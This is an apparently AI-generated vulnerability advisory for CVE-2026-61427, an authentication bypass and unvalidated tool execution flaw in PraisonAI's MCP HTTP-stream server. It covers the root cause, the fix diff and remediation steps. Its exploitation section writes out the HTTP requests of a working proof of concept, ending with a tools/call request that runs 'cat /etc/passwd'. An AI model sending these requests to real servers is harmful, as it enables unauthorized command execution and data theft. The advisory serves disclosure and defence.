CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-61427

CVE-2026-61427: Authentication Bypass and Unvalidated Tool Execution in PraisonAI MCP HTTP-Stream Server

Alon Barad
Alon Barad
Software Engineer

Oct 8, 2026·4 min read·4 visits

Executive Summary (TL;DR)

Unauthenticated remote attackers can query and invoke administrative tools on PraisonAI MCP servers due to missing default authentication and input validation.

CVE-2026-61427 is a critical authentication bypass and improper input validation vulnerability within the Model Context Protocol (MCP) HTTP-stream server of PraisonAI. In versions prior to 4.6.78, the server lacks authentication by default and forwards client messages directly to Python tool handlers without input validation. When bound to non-localhost interfaces, this permits unauthenticated remote attackers to perform unauthorized administrative operations and execute tools.

Vulnerability Overview

The Model Context Protocol (MCP) is an architectural standard designed to connect Large Language Models (LLMs) securely to external data repositories and execution tools. PraisonAI implements this protocol using a Server-Sent Events (SSE) server to manage downstream traffic and standard HTTP POST endpoints for receiving client requests.

Prior to version 4.6.78, the PraisonAI MCP HTTP-stream integration exposed critical interfaces without authentication by default. If an administrator failed to specify an API key, the authorization block was omitted from execution entirely. This design decision exposed a broad attack surface, allowing anyone with access to the server port to interact with underlying tools.

This flaw becomes highly critical when operators bind the MCP server to non-loopback network interfaces, such as 0.0.0.0. This configuration enables unauthenticated remote clients to fully enumerate capabilities and trigger python execution routines.

Root Cause Analysis

The primary root cause lies within src/praisonai/praisonai/mcp_server/transports/http_stream.py. Inside the endpoint logic, authentication is conditionally validated based on the existence of a configured API key. If the command-line execution parameter --api-key is not supplied, self.api_key defaults to None, bypassing the authorization check.

# Conditional check allowing execution without authorization headers
if self.api_key is not None:
    auth_header = request.headers.get("Authorization")
    if not auth_header or not auth_header.startswith("Bearer "):
        return HTTP_401_UNAUTHORIZED

A secondary root cause is improper input validation during parameter parsing. The MCP message dispatcher accepts arguments for tools/call requests and passes them directly into Python tool handlers. The dispatcher completely skips schema matching (inputSchema), rendering structural parameters unvalidated.

Code-Level Diff Analysis

To remediate the vulnerability, the initialization sequence of the HttpStreamTransport class was modified in commit 393de394087e3badc79acfec490323bcc99638bd. Developers introduced a strict verification check that halts execution if the server is exposed externally without an active API key configuration.

diff --git a/src/praisonai/praisonai/mcp_server/transports/http_stream.py b/src/praisonai/praisonai/mcp_server/transports/http_stream.py
--- a/src/praisonai/praisonai/mcp_server/transports/http_stream.py
+++ b/src/praisonai/praisonai/mcp_server/transports/http_stream.py
@@ -109,6 +109,11 @@ def __init__(
         else:
             self.allowed_origins = allowed_origins
+
+        # Verify that an api_key is configured when binding externally
+        if host not in ("127.0.0.1", "localhost", "::1") and not self.api_key:
+            raise ValueError(
+                "api_key is required when MCP HTTP-stream binds to a non-localhost address"
+            )

While this fix prevents network-level exploitation of default configurations, it does not mandate authentication for servers bound to localhost (127.0.0.1). If a local attacker, or a remote adversary leveraging Cross-Origin Resource Sharing (CORS) bypasses, interacts with the local port, unauthenticated tool execution remains possible.

Attack Methodology & Exploitation

Exploiting this flaw requires three sequential protocol steps: establishing an SSE stream, retrieving the schema structure of target tools, and dispatching a payload containing the execution request.

First, the attacker opens a persistent downstream channel to receive event notifications:

GET /sse HTTP/1.1
Host: target-ip:8000
Accept: text/event-stream

After retrieving a valid session identifier, the attacker lists available capabilities using the tools/list JSON-RPC method. This request is completed without any authorization parameters:

POST /message?session_id=attacker-session-123 HTTP/1.1
Host: target-ip:8000
Content-Type: application/json
 
{
  "jsonrpc": "2.0",
  "method": "tools/list",
  "id": 1
}

Finally, the attacker invokes an administrative tool (such as local command execution utilities) by targeting tools/call. Because parameter schemas are not validated, arbitrary command arguments are executed directly by the runtime environment:

POST /message?session_id=attacker-session-123 HTTP/1.1
Host: target-ip:8000
Content-Type: application/json
 
{
  "jsonrpc": "2.0",
  "method": "tools/call",
  "params": {
    "name": "execute_command",
    "arguments": {
      "command": "cat /etc/passwd"
    }
  },
  "id": 2
}

Remediation & Defensive Mitigation

System administrators must immediately upgrade PraisonAI to version 4.6.78 or later to restrict unauthenticated external bindings. Deployments using older versions must configure an API key on the command line interface.

pip install --upgrade praisonai

If upgrading is delayed, configure firewall filtering rules to restrict port 8000 (or the configured MCP port) strictly to loopback interfaces. This prevents external hosts from accessing endpoints directly:

iptables -A INPUT -p tcp -s 127.0.0.1 --dport 8000 -j ACCEPT
iptables -A INPUT -p tcp --dport 8000 -j DROP

Additionally, always launch services with explicit, randomly generated API keys rather than relying on default framework configurations:

praisonai mcp serve --transport http-stream --api-key "$(openssl rand -hex 32)" --host 0.0.0.0

Fix Analysis (1)

Technical Appendix

CVSS Score
7.3/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
EPSS Probability
0.39%
Top 69% most exploited

Affected Systems

PraisonAI MCP Server Component

Affected Versions Detail

Product
Affected Versions
Fixed Version
PraisonAI
MervinPraison
< 4.6.784.6.78
AttributeDetail
CWE IDCWE-306 (Missing Authentication), CWE-20 (Improper Input Validation)
Attack VectorNetwork
CVSS v3.17.3 (High)
EPSS Score0.00389 (~0.39% probability)
Exploit StatusProof of Concept (PoC)
CISA KEV StatusNot Listed

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
CWE-306
Missing Authentication for Critical Function

The product does not perform authentication for functionality that requires a provable user identity, and fails to validate inputs.

Vulnerability Timeline

Security patch committed and version 4.6.78 released
2026-06-25
Advisory published by VulnCheck
2026-07-15
CVE identifier CVE-2026-61427 assigned
2026-07-15

References & Sources

  • [1]GHSA-hc5v-gxvj-58wh
  • [2]PraisonAI Fix Commit
  • [3]VulnCheck Security Advisory
  • [4]NVD CVE-2026-61427 Details

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 2 hours ago•CVE-2026-107387
6.2

CVE-2026-107387: Uncontrolled Memory Allocation (OOM) in music-metadata APEv2 Parser

CVE-2026-107387 is a high-impact uncontrolled memory allocation vulnerability in music-metadata, a widely used Node.js metadata parser. The flaw occurs in the APEv2 tag parser, where the library reads an attacker-controlled 32-bit integer indicating the tag size and immediately requests a corresponding heap buffer reservation. Because this allocation occurs before validating if the input stream actually contains those bytes, an attacker can supply a minuscule audio file to trigger large, disproportionate allocations, resulting in heap exhaustion and an uncatchable process-wide Out of Memory (OOM) crash.

Amit Schendel
Amit Schendel
5 views•5 min read
•about 3 hours ago•CVE-2026-107391
6.2

CVE-2026-107391: Synchronous Infinite Loop and Memory Exhaustion in music-metadata MP4 Parser

An input validation vulnerability exists in music-metadata versions prior to 11.16.0, where parsing a crafted MP4 file containing a sample-description (stsd) box with a zero-value size entry causes a synchronous infinite loop and memory exhaustion, resulting in complete Denial of Service.

Alon Barad
Alon Barad
8 views•7 min read
•about 4 hours ago•CVE-2026-107377
7.5

CVE-2026-107377: Arbitrary File Write and Overwrite via Protobuf Weak Import Path Traversal in datamodel-code-generator

A path traversal vulnerability in datamodel-code-generator allows remote attackers to write or overwrite arbitrary files on the local host filesystem via a manipulated Protobuf schema containing malicious weak import paths.

Amit Schendel
Amit Schendel
10 views•5 min read
•about 5 hours ago•CVE-2026-61431
6.8

CVE-2026-61431: Arbitrary Local File Read and Path Traversal in PraisonAI ContextGatherer

PraisonAI is vulnerable to an arbitrary local file read vulnerability prior to version 4.6.78. The flaw is in the ContextGatherer component, where validation checks are executed only after files are parsed and appended to the context bundle, bypassing security constraints.

Amit Schendel
Amit Schendel
9 views•6 min read
•about 6 hours ago•CVE-2026-107212
7.5

CVE-2026-107212: CPU Exhaustion Denial of Service via Look-Ahead Row Parsing in Excelize

An algorithmic complexity vulnerability (CWE-770) in the Excelize library allows remote attackers to cause resource exhaustion (100% CPU usage) via a crafted Microsoft Excel spreadsheet. This occurs because the look-ahead row index parsing in Rows.Columns() fails to enforce upper boundary limits, enabling an out-of-bounds row index to trigger an infinite seek loop inside the Rows iterator.

Alon Barad
Alon Barad
14 views•6 min read
•about 7 hours ago•CVE-2026-105647
4.0

CVE-2026-105647: Server-Side Request Forgery via Favicon Probing in Ghost CMS

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in Ghost CMS from version 6.54.1 to 6.65.0. The vulnerability stems from a validation bypass in the favicon resolution logic within the bookmark-fetching subsystem, which allows remote, unauthenticated attackers to trigger arbitrary HTTP requests to the local host and internal networks. This bypass circumvents the custom DNS-level IP blocklist controls configured globally in the application.

Alon Barad
Alon Barad
8 views•8 min read